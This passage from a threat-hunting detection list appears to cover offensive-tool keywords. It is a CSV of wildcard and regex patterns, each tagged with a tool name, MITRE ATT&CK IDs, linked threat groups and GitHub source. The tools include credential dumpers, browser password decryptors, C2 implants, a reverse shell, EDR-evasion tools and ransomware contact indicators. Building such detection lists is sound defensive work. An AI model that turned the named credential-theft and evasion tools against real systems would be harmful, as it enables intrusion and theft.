"*decrypt_chrome_v20_cookie.py*",".{0,1000}decrypt_chrome_v20_cookie\.py.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","1","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","40581"
"*decrypt-chrome-passwords-main*",".{0,1000}decrypt\-chrome\-passwords\-main.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","N/A","10","10","966","211","2024-07-31T14:08:55Z","2020-12-28T15:11:12Z","40582"
"*Decrypting DPAPI data with masterkey *",".{0,1000}Decrypting\sDPAPI\sdata\swith\smasterkey\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","40583"
"*DecryptNextCharacterWinSCP*",".{0,1000}DecryptNextCharacterWinSCP.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40584"
"*DecryptNextCharacterWinSCP*",".{0,1000}DecryptNextCharacterWinSCP.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","40585"
"*Decrypt-RDCMan -FilePath*",".{0,1000}Decrypt\-RDCMan\s\-FilePath.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1555.005 - T1145 - T1003","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","40586"
"*Decrypt-RDCMan.ps1*",".{0,1000}Decrypt\-RDCMan\.ps1.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","1","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","40587"
"*DecryptRDCManager.exe*",".{0,1000}DecryptRDCManager\.exe.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","1","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","40588"
"*decryptteamviewer*",".{0,1000}decryptteamviewer.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","40589"
"*DecryptTeamViewer: Pillaging registry for TeamViewer information*",".{0,1000}DecryptTeamViewer\:\sPillaging\sregistry\sfor\sTeamViewer\sinformation.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","#content","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","40590"
"*DecryptTeamViewer-master.zip*",".{0,1000}DecryptTeamViewer\-master\.zip.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","1","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","40591"
"*decrypttozxybarc.dconnect.eu*",".{0,1000}decrypttozxybarc\.dconnect\.eu.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40592"
"*decrypttozxybarc.onion*",".{0,1000}decrypttozxybarc\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40593"
"*decrypttozxybarc.onion.cab*",".{0,1000}decrypttozxybarc\.onion\.cab.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40594"
"*decrypttozxybarc.onion.link*",".{0,1000}decrypttozxybarc\.onion\.link.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40595"
"*decrypttozxybarc.onion.to*",".{0,1000}decrypttozxybarc\.onion\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40596"
"*decrypttozxybarc.tor2web.org*",".{0,1000}decrypttozxybarc\.tor2web\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40597"
"*DecryptWinSCPPassword*",".{0,1000}DecryptWinSCPPassword.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40598"
"*DecryptWinSCPPassword*",".{0,1000}DecryptWinSCPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","40599"
"*DecryptWinSCPPassword*",".{0,1000}DecryptWinSCPPassword.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","40600"
"*dectokyo@cock.li*",".{0,1000}dectokyo\@cock\.li.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40601"
"*dectokyo@onionmail.org*",".{0,1000}dectokyo\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40602"
"*ded27a571bfbdf7f33a8582ba4d924604a825ed427c0e734d0b299328f2c544e*",".{0,1000}ded27a571bfbdf7f33a8582ba4d924604a825ed427c0e734d0b299328f2c544e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40603"
"*deda1e50aa7963be239c0e43bb7dcd05014b1e048f89fe08f537ef0ce19afe58*",".{0,1000}deda1e50aa7963be239c0e43bb7dcd05014b1e048f89fe08f537ef0ce19afe58.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","40604"
"*dedc1f4578fd081f28e2cca23dcb518fad39f9f782755bfa33e9723f32bb4487*",".{0,1000}dedc1f4578fd081f28e2cca23dcb518fad39f9f782755bfa33e9723f32bb4487.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","40606"
"*dedsec1da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd7871da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd787*",".{0,1000}dedsec1da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd7871da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd787.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","40608"
"*DEDSEC-RANSOMWARE.py*",".{0,1000}DEDSEC\-RANSOMWARE\.py.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","40609"
"*DEED6795-9EC9-4B2C-95E0-9E465DA61755*",".{0,1000}DEED6795\-9EC9\-4B2C\-95E0\-9E465DA61755.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","40610"
"*deef29cfacbf4ede0ee55bdf0a4d9c0aa8a53d33245849e7699c12148bd06865*",".{0,1000}deef29cfacbf4ede0ee55bdf0a4d9c0aa8a53d33245849e7699c12148bd06865.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40611"
"*deepce.sh -e *",".{0,1000}deepce\.sh\s\-e\s.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","40612"
"*DeEpinGh0st/Erebus*",".{0,1000}DeEpinGh0st\/Erebus.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","40613"
"*deepinstinct/ContainYourself*",".{0,1000}deepinstinct\/ContainYourself.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","40614"
"*deepinstinct/DCOMUploadExec*",".{0,1000}deepinstinct\/DCOMUploadExec.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","1","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","40615"
"*deepinstinct/Dirty-Vanity*",".{0,1000}deepinstinct\/Dirty\-Vanity.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","1","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","40616"
"*deepinstinct/Lsass-Shtinkering*",".{0,1000}deepinstinct\/Lsass\-Shtinkering.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","40617"
"*deepinstinct/LsassSilentProcessExit*",".{0,1000}deepinstinct\/LsassSilentProcessExit.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","40618"
"*deepinstinct/NoFilter*",".{0,1000}deepinstinct\/NoFilter.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","40619"
"*deepinstinct/ShimMe*",".{0,1000}deepinstinct\/ShimMe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","1","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","40620"
"*deepsound2john.py*",".{0,1000}deepsound2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","40621"
"*def nemesis_post_data(*",".{0,1000}def\snemesis_post_data\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","40622"
"*def46f338013e516bbe3823ab661abb80e80e1388f2b57c3aa9dedee7f4735be*",".{0,1000}def46f338013e516bbe3823ab661abb80e80e1388f2b57c3aa9dedee7f4735be.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","40626"
"*defanger exclusion*",".{0,1000}defanger\sexclusion.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","40629"
"*defanger realtime*",".{0,1000}defanger\srealtime.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","40630"
"*defanger signature*",".{0,1000}defanger\ssignature.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","40631"
"*default NIC of tun2socks is working on Spoofing mode*",".{0,1000}default\sNIC\sof\stun2socks\sis\sworking\son\sSpoofing\smode.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40632"
"*default password:rebeyond*",".{0,1000}default\spassword\:rebeyond.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#content","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","40633"
"*default_userpass_for_services_unhash*",".{0,1000}default_userpass_for_services_unhash.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40635"
"*default_users_for_services_unhash.txt*",".{0,1000}default_users_for_services_unhash\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common 